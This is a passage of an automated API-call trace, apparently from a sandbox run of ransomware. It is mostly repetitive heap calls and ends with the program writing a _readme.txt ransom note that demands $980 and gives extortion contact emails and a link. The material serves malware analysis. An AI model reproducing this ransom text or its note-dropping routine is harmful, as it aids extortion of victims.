hHeap=0xcd0000) returned 1 [0166.053] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.053] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0166.053] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.053] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.053] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.053] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0166.053] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.053] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.053] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.053] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0166.053] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.053] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.053] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.053] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0166.053] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.053] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.053] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.053] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0166.053] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.053] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.053] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.053] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0166.053] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.053] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.053] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.053] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0166.053] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.053] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.053] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.053] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0166.053] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.053] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.053] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.054] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0166.054] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.054] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.054] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.054] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0166.054] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0166.054] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.054] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0166.054] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.054] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.054] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0166.054] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.054] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.054] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.054] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0166.054] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0166.054] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.054] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.054] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0166.054] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0166.054] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.054] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.054] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0166.054] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.054] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.054] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.054] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0166.054] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.054] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.054] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.054] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0166.054] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0166.054] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.055] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0166.055] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.055] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.055] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0166.055] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.055] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.055] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.055] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0166.055] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.055] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.055] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.055] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0166.055] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.055] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.055] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.055] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0166.055] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.055] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.055] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.055] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0166.055] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.055] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.055] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.055] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0166.055] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.055] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.055] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.055] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0166.055] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.055] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.055] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.056] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0166.056] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.056] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.056] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.056] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0166.056] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.056] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.056] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.056] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0166.056] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0166.056] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.056] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0166.056] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.056] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.056] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0166.056] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.056] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.056] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.056] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0166.056] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0166.056] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.056] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.056] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0166.056] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0166.056] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.056] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.056] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0166.056] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.056] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.056] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.057] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0166.057] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.057] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.057] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.057] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0166.057] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0166.057] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.057] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0166.057] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.057] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.057] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0166.057] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.057] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.057] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.057] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0166.057] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.057] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.057] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.057] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0166.057] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.057] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.057] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.057] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0166.057] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.057] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.057] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.057] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0166.057] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.057] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.057] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.057] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0166.057] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.057] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.057] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.057] PathFindFileNameW (pszPath="C:\\Boot\\sv-SE\\") returned="sv-SE\\" [0166.058] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0166.058] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.058] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0166.058] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0166.058] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0166.058] PathFindFileNameW (pszPath="") returned="" [0166.058] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0166.058] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0166.058] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0166.058] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x800) returned 0x3b40090 [0166.058] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b40090 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0166.058] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x810) returned 0x3b19640 [0166.058] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.058] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.058] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c638 [0166.058] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0166.059] FreeLibrary (hLibModule=0x759d0000) returned 1 [0166.059] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.059] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0166.059] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c638 | out: hHeap=0xcd0000) returned 1 [0166.059] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c638 [0166.059] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x81c) returned 0x3b19640 [0166.059] PathAppendW (in: pszPath="C:\\Boot\\sv-SE\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\sv-SE\\_readme.txt") returned 1 [0166.059] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0166.059] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c638 | out: hHeap=0xcd0000) returned 1 [0166.059] PathFileExistsW (pszPath="C:\\Boot\\sv-SE\\_readme.txt") returned 0 [0166.059] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x7d00) returned 0x3b47e70 [0166.059] lstrcpyW (in: lpString1=0x3b47e70, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" [0166.059] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde", lpString2="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" [0166.059] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b1a750 [0166.059] CreateFileW (lpFileName="C:\\Boot\\sv-SE\\_readme.txt" (normalized: "c:\\boot\\sv-se\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0166.059] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b1a750 | out: hHeap=0xcd0000) returned 1 [0166.059] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b47e70 | out: 